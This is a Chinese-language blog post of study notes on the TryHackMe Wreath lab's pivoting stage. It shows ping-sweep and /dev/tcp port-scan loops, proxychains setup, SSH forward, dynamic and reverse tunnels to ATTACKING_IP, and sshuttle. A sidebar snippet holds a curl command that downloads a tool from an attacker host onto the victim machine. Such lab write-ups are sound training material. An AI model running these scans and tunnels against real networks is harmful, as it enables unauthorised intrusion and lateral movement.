tryhackme之渗透测试基础案例之横向移动,内网渗透Wreath-2 pivoting

最新推荐文章于 2024-08-12 08:40:27 发布
最新推荐文章于 2024-08-12 08:40:27 发布
阅读量808 收藏 1
点赞数
分类专栏: tryhackme web安全 文章标签: linux ssh 安全漏洞 信息安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43200143/article/details/119712711
版权

文章目录

2.pivoting

通过一台机器,进而攻击内网其他机器(公网无法访问到)

在这里插入图片描述

metasploit等工具可以很容易做到,

手动:

1.隧道/代理

可以逃避简单的IDS的检测

2.端口转发

各有优缺吧,具体要看环境。先进一步探测一下看看再说

从这一步开始绘制拓扑图

如果获取了多个入口,Linux比较好横向移动

metasploit有个命令可以直接路由转发 portfwd

横移的第一步是收集信息

1.hosts文件,arp缓存

2.使用已经安装的软件

3.静态编译的工具

4.脚本

5.通过代理用本地的工具

代理用本地的可能很慢,所以不建议优先选择

优先选用本地有的软件,比如Linux有的时候会默认安装nmap

同时,这个时候要保持隐蔽性,不能大张旗鼓。

Linux arp -a

nmcli dev show

查看静态路由 /etc/hosts 本地dns服务器:/etc/resolv.conf

(may be misconfigured to allow something like a DNS zone transfer attack

windows arp -a

ipconfig /all 查看 C:\Windows\System32\drivers\etc\hosts

之所以用静态编译的是因为它理论上可以用在任何系统上,不然一些动态库之类的可能会影响效果。

资源网站:https://github.com/andrew-d/static-binaries

如果已经攻陷的机器没有nmap的话。。可以用脚本试试

比如bash脚本

for i in {1..255}; do (ping -c 1 192.168.1.${i} | grep "bytes from" &); done

powershell的话,很慢

C# C C++ Rust等还可以

https://github.com/MuirlandOracle/C-Sharp-Port-Scan

https://github.com/MuirlandOracle/CPP-Port-Scanner

有时候防火墙会阻止ICMP的ping

for i in {1..65535}; do (echo > /dev/tcp/192.168.1.1/$i) >/dev/null 2>&1 && echo $i is open; done

在这里插入图片描述

下面会用两种工具

Proxychains

这款工具用在其他工具前面,帮助其他工具走代理

比如:proxychains nc 172.16.0.10 23

上面代理并没有指定端口。它会从配置文件中读取 。

/etc/proxychains.conf

配置文件有几个地方可能存在。

读取顺序为:

  1. The current directory (i.e. ./proxychains.conf)
  2. ~/.proxychains/proxychains.conf
  3. /etc/proxychains.conf

目前对我们有用的地方就是这里

在这里插入图片描述

如果要用nmap扫描的话注释掉这个

在这里插入图片描述

注意事项:

1.只能用TCP scans 所以nmap的话,用-Pn

2.非常慢

FoxyProxy

如果要访问网页的话,这个很好用!

在这里插入图片描述
在这里插入图片描述

SSH 隧道 / 端口转发

正向连接

用ssh客户端进行ssh隧道建立

1.端口转发 用-L命令

举个例子:我们可以连接172.16.0.5,然后有个web服务器,ip是172.16.0.10

我们可以创建一个到服务器的链接

ssh -L 8000:172.16.0.10:80 user@172.16.0.5 -fN

现在我们就可以通过本地的8000端口访问,通过ssh连接的机器访问web服务器,

-f 将任务放到后台

-N 只连接,不执行别的命令了

2.代理

-D 设置端口,这个端口要在proxychains中设置

这个可以和proxychains结合利用

ssh -D 1337 [user@172.16.0.5](mailto:user@172.16.0.5) -fN

通过本地1337端口,发送数据到攻击的网络中

反弹连接

ssh客户端连接很可能是反向连接??

当拿到一个shell但是没有ssh连接的话,反弹shell很常见

需要几步来保证反向连接的安全性

1.先生成一组新的ssh密钥并且存放在安全的地方。 命令 ssh-keygen

在这里插入图片描述

2.编辑~/.ssh/authorized_keys

先输入command=“echo ‘This account can only be used for port forwarding’”,no-agent-forwarding,no-x11-forwarding,no-pty

保证只能用于端口转发,不能获取shell

在这里插入图片描述

3.检查一下服务器状态

sudo systemctl status ssh

如果没开的话打开一下sudo systemctl start ssh

4.将私钥上传到攻陷的机器,看起来不可想象,通常不会这样做,所以我们生成了一次性的密钥

5.用下面的命令来做端口转发

ssh -R LOCAL_PORT:TARGET_IP:TARGET_PORT USERNAME@ATTACKING_IP -i KEYFILE -fN

在这里插入图片描述

现在windows也有内置的ssh客户端,所以我们也能在windows上实行这种攻击

sshuttle

它和其他的不太一样,更像模拟vpn。

通过ssh建立的隧道,传送的shu’j是加密的

它也有缺点,只能在Linux上用,需要ssh连接,需要python(可以上传静态python

kali安装:sudo apt install sshuttle

用法:

sshuttle -r username@address subnet

例如:sshuttle -r user@172.16.0.5 172.16.0.0/24

不过也可以用-N来自动获取路由

sshuttle -r username@address -N (不一定会成功

也可以在最后加一个& 来将将进程放置在后台

如果执行成功,会显示 c : Connected to server.

在这里插入图片描述

刚刚那种方式需要输入密码,如果没有密码呢?或者不支持密码登录

它本身没有指定的命令,不过我们可以Bypass

sshuttle -r user@address --ssh-cmd “ssh -i KEYFILE” SUBNET

报错处理:

client: Connected.

client_loop: send disconnect: Broken pipe

client: fatal: server died with error code 255

这个错误的原因是,受害机器就是这个子网的机器

解决方案: -x 排除自己

sshuttle -r user@172.16.0.5 172.16.0.0/24 -x 172.16.0.5

唐仔橙
关注
专栏目录
交际场合---英文单词
知识改变命运,ヾ(◍°∇°◍)ノ゙【求关注】
04-11 1092
加油。
tryhackme之Wreath-3 渗透测试基础案例内网渗透 继续进攻
qq_43200143的博客
08-15 431
文章目录3.继续进攻获得反弹shellcURL访问webshell先用webshell干点事在反弹shell前,先看一下它能否访问外网 方法也很多 3.继续进攻 往受害机器上上传nmap(静态编译好的) 可以开一个python的http服务 sudo python3 -m http.server 80 在受害机器上执行 curl ATTACKING_IP/nmap-USERNAME -o /tmp/nmap-USERNAME && chmod +x /tmp/nmap-USERNAME
内网渗透-内网环境下的横向移动总结
lza20001103的博客
04-14 1910
内网环境下的横向移动总结
sshuttle: 透明SSH代理,实现穷人的虚拟私有网络
最新发布
gitblog_00424的博客
08-12 378
sshuttle: 透明SSH代理,实现穷人的虚拟私有网络 sshuttleTransparent proxy server that works as a poor man's VPN. Forwards over ssh. Doesn't require admin. Works with Linux and MacOS. Supports DNS tunneling.项目地址:ht...
Pivoting跳板攻击与自动路由
weixin_45007073的博客
03-21 858
网络拓扑图及通信原理 我们现在假若得到了192.168.103.101的主机权限,但是我们经过收集信息发现只有该win7主机是出网的,里面还有一个网段的主机不出网,那么这时我们就要使用跳板攻击的方式访问到不出网的主机。这里我们假设出网的网段为192.168.103.0/24,不出网的数据库主机所处网段为192.168.104.0/24,我们在vmware上分别设置好这两个网段。 vmnet2之前上一章已经配置完成,vmnet3设置DHCP配置 以下分别是win7和windows server2003的网
tryhackme之Wreath-1.渗透测试基础案例之初步信息收集+打点
qq_43200143的博客
08-15 499
前言:这是tryhackme的一大变化,出了一个系统的攻防的模拟环境,模拟前期打点,获取权限后,内网横向移动,以及最终打到个人PC等。这个系列文章正在更新。。 文章目录1.初步信息收集+打点扫描,探测进一步的攻击吧! 1.初步信息收集+打点 给了一个工具包,推荐还是用最新的,密码是WreathNetwork PS‼️ 上传工具的话,别上传原始名字,改一下,比如工具名-你的昵称。因为大家是共用的这个环境。 Linux:Ctrl+T 可以把任务隐藏在后台,当前终端继续使用 故事背景: 多年不联系的老朋友Thom
内网渗透学习04——域内横向移动
box
02-24 5717
文章目录0x00 Windows系统密码和Hash获取分析和防范1. Windows 系统密码和Hash获取1.1 使用工具将散列值和明文从内存中导出。1.2 通过SAM和System文件抓取密码1.3Mimikatz 在线读取Hash和密码明文1.4 Mimikatz 离线读取Hash和密码明文1.5 Nishang2. 防范密码和Hash凭证窃取0x01 哈希传递攻击和防范0x02 IPC1. IPC 入侵2. 计划任务 at schtasksatschtasks3. impacket 工具包
Wreath_PenTest_Report:TryHackMe的花圈室记录
04-06
Wreath_PenTest_Report TryHackMe的花圈室记录
Wreath_PenTest_Report-源码.rar
10-10
【标题】"Wreath_PenTest_Report-源码.rar" 指的是一份关于网络安全的渗透测试报告,源码部分可能包含了用于测试的安全工具、脚本或代码。渗透测试,也称为“白帽”黑客攻击,是通过模拟恶意黑客的攻击方式来评估...
lidless:大眼,无盖,在网络摄像头中wreath
05-25
2.3可能有效,但尚未成功测试。 CPython 2.6或2.7(其他python也可以工作) python-irclib 龙卷风( ) 下的所有内容都应同时从github上拉出/更新; 我不时地从根本上改变模块及其用户的工作方式。 诚然,
android代理服务设置软件(无需root)
10-18
真正好用的android代理服务设置软件(无需root)
内网渗透-SSH隧道
weixin_45427778的博客
08-18 523
内网渗透之——ssh隧道 网络拓扑图ssh 正向链接: 在web服务器执行 ssh -CNfL 0.0.0.0:7777:10.10.10.128:80 web@127.0.0.1 在web服务器做端口映射,将数据服务器的80端口映射到web服务器的7777端口,随后访问192.168.0.144:7777即可访问到数据库的80页面。 反向连接: 将web服务器的22端口转发出去到黑客IP web服务器执行: ssh -qTfnN -R 2222:127.0.0.1 root@192.
内网横向移动——SNMP信息收集
Captain_RB的博客
09-04 2539
SNMP协议被称为信息的金矿,经常被错误配置,如果可以通过SNMP的安全认证,则可以获取非常丰富的设备信息,且低版本SNMP报文以明文传输,容易被抓包分析。本文主要介绍SNMP的工作原理,以及利用其进行内网横向移动的常见方法。
sshuttle工具简介
文思源想的技术空间
11-02 4547
1 sshuttle简介 最近在k8s配置用到shuttle,只知道公司用它完成远端k8s集群环境网络环境打通环境工作,于是决定研究一下它,了解这个穷人代理究竟魅力何在。 01-github链接 sshuttle和ssh的tunnle不同不是基于TCP-over-TCP的,而是叫data over tcp的,省去了一次包裹。 2 sshuttle用法 sudo sshuttle -v 0/0 sudo sshuttle -vNHr example.org #### 1 sshuttle -r指定一台远端服务
sshuttle全局代理的实现简析
热门推荐
开发者说
11-27 1万+
最近使用sshuttle实现全局代理,顺便研究了一下实现的具体原理。 直接进入主题,先看一下启动的输出信息: 先绑定到本地的12300端口,将数据通过远端的ssh服务器进行路由转发。sshuttle和ssh的tunnle不同不是基于TCP-over-TCP的,而是叫data over tcp的,省去了一次包裹。然后建立端口映射,输出信息如下: 很明显是通过iptables的代
内网穿透工具一览表:助你快速搭建内网服务
wuli1024的博客
01-11 6854
内网穿透是指在局域网中,通过一些工具和技术,将内网中的服务或者资源映射到互联网上,让外部用户可以访问和使用。
使用Metasploit实现渗透攻击
2201_76043604的博客
06-24 1228
网络渗透攻击是一种系统渐进型的综合攻击方式,其攻击目标是明确的,攻击目的往往不那么单一, 危害性也非常严重。例如 ,攻击者会有针对性地对某个目标网络进行攻击,以获取其内部的商业资料,进行网络破坏等。因此,攻击者实施攻击的步骤是非常系统的,假设其获取了目标网络中网站服务器的权限,则不会仅满足于控制此台服务器,而是会利用此台服务器, 继续入侵目标网络,获取整个网络中所有主机的权限。二、Metasploit本次实验主要讲解了(1)Metasploit的基础使用和方法基本命令。
内网渗透测试:内网横向移动基础总结
KH_FC的博客
12-29 5841
内网渗透测试:内网横向移动基础总结 横向移动内网渗透中,当攻击者获取到内网某台机器的控制权后,会以被攻陷的主机为跳板,通过收集域内凭证等各种方法,访问域内其他机器,进一步扩大资产范围。通过此类手段,攻击者最终可能获得域控制器的访问权限,甚至完全控制基于Windows操作系统的整个内网环境,控制域环境下的全部机器。 在这篇文章中,我们来讲解一下横向移动的思路与攻击手法。 由于最近开学了有很多很多的事,所以一直没有时间更新,文章可能略显仓促,不足之处还请多多指教。 本文大多是我最近的学习总结,专为想我一样
TryHackMe-进攻性渗透测试-13_AD_横向移动和旋转
M1n9K1n9的博客
12-24 719
简而言之,横向移动是攻击者用来在网络中移动的一组技术。一旦攻击者获得了对网络第一台计算机的访问权限,移动就是必不可少的,原因有很多,包括: - 实现我们作为攻击者的目标 - 绕过现有的网络限制 - 建立额外的网络入口点 - 制造混乱并避免检测。虽然许多网络杀伤链将横向移动作为线性过程中的额外步骤,但它实际上是循环的一部分。在此周期中,我们使用任何可用的凭据来执行横向移动,从而使我们能够访问新计算机,在这些机器中,我们可以提升权限并在可能的情况下提取凭据。使用新发现的凭据,循环再次开始。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值